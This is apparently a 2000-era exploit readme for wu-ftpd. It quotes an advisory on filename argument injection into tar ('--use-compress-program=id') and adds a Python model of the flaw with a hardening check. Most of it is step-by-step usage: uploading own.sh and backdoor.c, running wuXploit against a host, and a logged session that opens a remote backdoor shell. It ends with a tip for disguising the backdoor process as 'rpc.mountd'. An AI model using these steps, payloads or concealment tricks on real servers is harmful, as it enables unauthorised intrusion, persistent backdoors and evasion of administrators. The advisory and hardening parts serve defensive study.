              WuFtp Remote/Local Exploit by wildcoyote@coders-pt.org

  Tested On:

  It must be stated here that this vulnerability is quite cross-platform, in
  that it is possible for FTP site administrators running wu-ftpd on any
  operating system to have configured FTPD in this manner. However it is
  generally more prevalent on Linux installations.

  This vulnerability was verified against the following configuration:
	
      RedHat (5.2, 6.0, 6.1)
      anonftp package version 2.8.1
      wu-ftpd (2.4.2, 2.5.0, 2.6.0)

  Advisory: (by suid@suid.kg)

  There exists a vulnerability with certain configurations of certain
  ftp daemons with which users with a valid ftp-only account on a
  system may execute arbitrary commands (including binaries supplied by
  themselves). There also exists the possibility that anonymous ftp users
  may execute arbitrary commands (also including binaries supplied by
  themselves).

  -> To be more exact... <-

  FTP Conversion is the name given to the process whereby a user can
  convert/archive/compress data on the fly when retrieving files from
  an FTP server. This is done when the FTP user requests a filename and
  appends .tar/.tar.gz/.Z/.gz to the filename. The FTP daemon then opens a
  pipe through the requested binary (/bin/tar for example) and sends the file
  through this pipe to the user.

  Vulnerability:

  If a user with intent crafts a filename beginning with a '-' sign it is
  possible to pass arbitrary flags to the command invoked by FTPD. If the
  user also includes spaces in this filename, they may pass further arguments.
  Modern tar implementations include some fairly interesting arguments. For
  the purposes of this advisory I will only detail one.
	
  From the tar(1) man page:

    --use-compress-program PROG
      filter the archive through PROG (which must accept -d)

  So it can be seen quite obviously that the flag:

     --use-compress-program=id

  will invoke the id command as a compression program for tar to filter
  through, obviously failing in the process, but trying nonetheless.
  Using this mechanism it is possible to invoke any command in the path.
  It is also, as mentioned previously, possible to pass those commands
  further arguments.

  End of advisory by suid@suid.kg
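  Added illustration (this is neither part of suid's advisory nor wu-ftpd
  source): a small Python model of the two steps that make the injection
  possible, namely substituting the client-supplied name into the conversion
  command and then splitting that string on whitespace into an argv. The
  ftpconversions sample below is constructed in the colon-separated layout
  of that file, modelled on the .tar entries shipped with the anonftp package;
  the exact entries and the function names are assumptions made for the
  example. The last function is a hardening check a site could apply to
  requested names, not something wu-ftpd did at the time.

```python
import re

# Constructed sample (assumption) in the ftpconversions layout:
# strip prefix:strip postfix:addon prefix:addon postfix:external command:
# types:options:description
SAMPLE_FTPCONVERSIONS = """\
 : : :.tar:/bin/tar -c -f - %s:T_REG|T_DIR:O_TAR:TAR
 : : :.tar.gz:/bin/tar -c -z -f - %s:T_REG|T_DIR:O_COMPRESS|O_TAR:TAR+GZIP
"""


def parse_conversions(text):
    """Return (addon_postfix, command_template) pairs from an ftpconversions body."""
    rules = []
    for line in text.splitlines():
        fields = [f.strip() for f in line.split(":")]
        if len(fields) < 5 or not fields[4]:
            continue
        rules.append((fields[3], fields[4]))
    return rules


def build_argv(rules, requested):
    """Model the daemon's conversion path.

    Match the requested name against the addon postfix, strip it, drop the
    remaining name into the command template in place of %s, then split the
    whole string on whitespace. That split is the weak point: a name that
    starts with '-' becomes an option and a name containing spaces becomes
    several arguments. Returns None when no conversion applies.
    """
    for postfix, template in rules:
        if postfix and requested.endswith(postfix):
            name = requested[: -len(postfix)]
            cmdline = template.replace("%s", name)
            return cmdline.split()
    return None


def safe_filename(name):
    """Hardening check for a name about to be substituted into a template.

    Rejects empty names, names that begin with '-' (would be parsed as an
    option) and names containing whitespace (would split into extra
    arguments). A template could additionally put '--' before %s so that
    GNU tar stops option parsing, but this check does not rely on that.
    """
    if not name or name.startswith("-"):
        return False
    return re.fullmatch(r"\S+", name) is not None


def demo():
    """Show the argv produced for a benign request and for an injected one."""
    rules = parse_conversions(SAMPLE_FTPCONVERSIONS)
    for requested in ("pub/dir.tar", "--use-compress-program=id.tar",
                      "--use-compress-program=sh -c id.tar"):
        argv = build_argv(rules, requested)
        print(f"{requested!r:45} -> {argv}  safe={safe_filename(requested[:-4])}")
    return rules


if __name__ == "__main__":
    demo()
```

  Running the block prints the argv for each request; the second and third
  requests show the injected option and the extra arguments sitting in the
  argv exactly where the advisory says they end up.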

  My findings and my code...

  I used RedHat 6.0 Kernel 2.2.5-15

  I don't have anonftp installed on my redhat box so I could only try my
  code as a "normal" user :]

  What I found was that...

   a) the backdoor's privileges were 'my user' ones...
   b) I think that this bug will ONLY happen if you have the anonftp package
      installed! Still have to check! :|

  Either way...the code was run by the daemon (but...it surely 'suided' to my
  normal user before :P (of course))
  The question is...what will it do if you use my code with an anonymous
  account? ;) What user will it 'suid' to run tha code? :P
  -> There is no anonymous user account on the box <-
  PUFF! According to the advisory, and common sense, r00t!
  (or the own3r of the daemon running the wu.ftpd)

  Conclusion:

  Like I said..I don't know if I just have my box "well" configured...or if it
  doesn't work on a normal user...either way...TEST IT! :]

  How to use this:

  [wildcoyote@userfriendly wuXploit]$ ls -l
  total 13
  -rw-r--r--   1 wildcoyo wildcoyo     1473 Jun 27 18:22 backdoor.c <- evil BD
  -rw-rw-r--   1 wildcoyo wildcoyo       86 Jun 27 18:29 own.sh     <- script
  -rwxr-xr-x   1 wildcoyo wildcoyo     7037 Jun 27 19:29 readme.txt <- Thiz file
  -rwxr-xr-x   1 wildcoyo wildcoyo     5661 Jun 27 19:28 wuXploit.c <- tha c0d3
  [wildcoyote@userfriendly wuXploit]$

  All you have to do is:

  a) Upload the files (anonymous account/normal user)

  [wildcoyote@userfriendly wuXploit]$ ftp biatx
  Connected to biatx.userfriendly.
  220 biatx.userfriendly FTP server (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999) ready.
  Name (biatx:wildcoyote): wildcoyote
  331 Password required for wildcoyote.
  Password:
  230 User wildcoyote logged in.
  Remote system type is UNIX.
  Using binary mode to transfer files.
  ftp> cd /tmp
  250 CWD command successful.
  ftp> put own.sh
  local: own.sh remote: own.sh
  200 PORT command successful.
  150 Opening BINARY mode data connection for own.sh.
  226 Transfer complete.
  86 bytes sent in 0.0158 secs (5.3 Kbytes/sec)
  ftp> put backdoor.c
  local: backdoor.c remote: backdoor.c
  200 PORT command successful.
  150 Opening BINARY mode data connection for backdoor.c.
  226 Transfer complete.
  1473 bytes sent in 0.00749 secs (1.9e+02 Kbytes/sec)
  ftp> quit
  221-You have transferred 1559 bytes in 2 files.
  221-Total traffic for this session was 2175 bytes in 2 transfers.
  221-Thank you for using the FTP service on biatx.userfriendly.
  221 Goodbye.
  
  b) Compile the c0d3
 
  Note: Ignore any warnings when compiling the code :]

  [wildcoyote@userfriendly wuXploit]$ cc wuXploit.c -o wuXploit
  [wildcoyote@userfriendly wuXploit]$
  
  c) Execute the c0d3

  [wildcoyote@userfriendly wuXploit]$ ./wuXploit

  WuFtpd Remote/Local Exploit by wildcoyote@coders-pt.org

  Sintaxe: ./wuXploit <login> <password> <dir> <host> [wuftp port] [backdoor port]
  Example:

   -> If you have a account on tha box <-
      ./wuXploit wildcoyote my_password /tmp biatx.userfriendly
   -> Anonymous access on tha box <-
      ./wuXploit ftp ftp /incoming 192.168.0.2

  Use only the backdoor port argument if you changed backdoor.c!
  Greetz to tha world :]

  [wildcoyote@userfriendly wuXploit]$ ./wuXploit wildcoyote password /tmp biatx

  WuFtpd Remote/Local Exploit by wildcoyote@coders-pt.org

  Trying to connect to biatx[21]...SUCCESSFULL
  Sending username (wildcoyote)...DONE
  Sending password (**********)...DONE
  SYST...DONE
  TYPE I...DONE
  Changing dir to /tmp...DONE
  Setting up'evil'code :[ ...DONE
  Compiling/Running backdoor...DONE
  Let's delete the EVIL'entry :[ ...DONE
  Oh k! It's a WRAP :D
  Checking if tha backdoor is up...
  Connecting to biatx [5343]...SUCCESS
  Tha backdoor is running! ;)
  Dr@@ping you to tha own3d shell...
  Start typing dewd ;)
  id
  uid=500(wildcoyote) gid=500(wildcoyote) groups=500(wildcoyote)

  ls -l
  total 19
  -rwxr-xr-x   1 wildcoyo wildcoyo    13572 Jan  1 00:41 backdoor
  -rw-r--r--   1 wildcoyo wildcoyo     1215 Jan  1 00:41 backdoor.c
  drwx------   2 wildcoyo wildcoyo     1024 Jun 25  2000 orbit-wildcoyote
  -rw-rw-r--   1 wildcoyo wildcoyo       86 Jan  1 00:41 own.sh

  exit
  The connection was closed!
  Exiting...

  [wildcoyote@userfriendly wuXploit]$

  Just one more thing...you can give a fake name to the process running
  the backdoor :] (only while nobody is connected to it; once you connect,
  it renames itself "sh")
  To do so just...

  [wildcoyote@userfriendly wuXploit]$ pico backdoor.c
  <line 18 of backdoor.c>
  #define DEFINED_EXCUSE_FOR_A_BACKDOOR "rpc.mountd" <-- define fake name here

  And exit pressing F2 or ^X :P
                                        regardz, wC (wildcoyote@coders-pt.org)
